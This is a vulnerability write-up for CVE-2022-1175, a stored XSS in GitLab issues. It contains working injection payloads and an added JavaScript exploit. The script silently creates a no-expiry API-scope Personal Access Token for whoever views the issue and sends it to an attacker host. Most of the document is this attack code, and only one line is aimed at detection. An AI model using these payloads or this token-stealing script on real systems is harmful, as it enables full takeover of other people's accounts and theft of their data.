CVE-2022-1175

GitLab stored XSS. The payload can be placed in an issue on a project, either your own or another user's. It allows attacks such as creating and stealing a Personal Access Token (PAT) of anyone who visits the issue. A PAT then provides full GitLab API access as that user, which is equivalent to a full account takeover.

One way to abuse it is to inject a <base href> pointing at your site, so every relative script URL on the page is resolved against your host and the page's own scripts are sourced from there. Host JavaScript on your site under the same paths as the scripts the page requests. This can break functionality on the page, because the real scripts no longer load unless you mirror them.

<pre data-sourcepos="&#34;%22 href=&#34;x&#34;></pre><base href=http://unsafe-website.com/><pre x=&#34;"><code></code></pre>

A standard script include also works, depending on the site's CSP. This is stealthier, since the page's own scripts keep loading and nothing visibly breaks.

<pre data-sourcepos="&#34;%22 href=&#34;x&#34;></pre><script src="https://attacker-site.com/bad.js"></script><pre x=&#34;"><code></code></pre>
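The writeup says the XSS can be used to create and steal a PAT for whoever views the issue. Below is an added example of what bad.js from the script-include variant could contain; it is not code from the original writeup or from GitLab. The endpoint /-/profile/personal_access_tokens, the personal_access_token[...] form field names, the csrf-token meta tag, the new_token JSON field and the collector URL on attacker-site.com are assumptions that must be checked against the target version. The network layer is injected so the same logic can be exercised offline with a fake fetch.

```javascript
// Added example (not from the original writeup): runs in the victim's browser
// after the stored XSS fires, creates a PAT with api scope through the profile
// form, and sends it to the attacker's collector.
// ASSUMPTIONS (not verified against any specific GitLab version): the CSRF token
// sits in <meta name="csrf-token">, the PAT form posts to PAT_PATH with
// personal_access_token[...] fields, and the JSON response carries "new_token".

const PAT_PATH = '/-/profile/personal_access_tokens';   // assumed form endpoint
const EXFIL_URL = 'https://attacker-site.com/collect';    // assumed collector on the writeup's host

// Pull Rails' CSRF token out of the page HTML; form posts without it are rejected.
function extractCsrfToken(html) {
  const m = html.match(/<meta[^>]*\bname=["']csrf-token["'][^>]*\bcontent=["']([^"']+)["']/i)
         || html.match(/<meta[^>]*\bcontent=["']([^"']+)["'][^>]*\bname=["']csrf-token["']/i);
  return m ? m[1] : null;
}

// Build the form body the PAT page would submit (field names are assumptions).
function buildPatForm(csrfToken, name = 'backup', scopes = ['api']) {
  const body = new URLSearchParams();
  body.set('authenticity_token', csrfToken);
  body.set('personal_access_token[name]', name);
  body.set('personal_access_token[expires_at]', '');   // no expiry
  for (const s of scopes) body.append('personal_access_token[scopes][]', s);
  return body.toString();
}

// Assumed success shape: { "new_token": "glpat-..." }; anything else yields null.
function parseNewToken(jsonText) {
  try {
    const obj = JSON.parse(jsonText);
    return typeof obj.new_token === 'string' ? obj.new_token : null;
  } catch (_) {
    return null;
  }
}

// Full chain: GET the PAT page (same-origin, so session cookies are attached),
// POST the form with the CSRF token, then beacon the new token to the attacker.
async function stealPat(fetchImpl, origin = '') {
  const page = await fetchImpl(origin + PAT_PATH, { credentials: 'same-origin' });
  const csrf = extractCsrfToken(await page.text());
  if (!csrf) throw new Error('no csrf token on PAT page');

  const res = await fetchImpl(origin + PAT_PATH, {
    method: 'POST',
    credentials: 'same-origin',
    headers: {
      'Content-Type': 'application/x-www-form-urlencoded',
      'Accept': 'application/json',
      'X-CSRF-Token': csrf,
    },
    body: buildPatForm(csrf),
  });
  const token = parseNewToken(await res.text());
  if (!token) throw new Error('no token in response');

  // Cross-origin GET in no-cors mode: the request is sent even though the
  // response is opaque, so the collector needs no CORS headers.
  await fetchImpl(EXFIL_URL + '?t=' + encodeURIComponent(token), { mode: 'no-cors' });
  return token;
}

// Only self-start inside a real browser; in Node this file just defines the functions.
if (typeof window !== 'undefined' && typeof window.fetch === 'function') {
  stealPat(window.fetch.bind(window)).catch(() => {});
}
```

The same payload can be served under the <base href> variant too, but there it has to be stored at whatever relative script path the page requests, and the page's other scripts will 404 unless mirrored. A defender reviewing PAT creation events for tokens named by a generic label and created seconds after an issue view would see this chain.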

The GitLab developers included the full XSS string in the fix, so it can be read straight out of the diff between the vulnerable and patched releases:

https://gitlab.com/gitlab-org/gitlab/-/compare/v14.9.1-ee...v14.9.2-ee?from_project_id=278964&page=4

Reference:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1175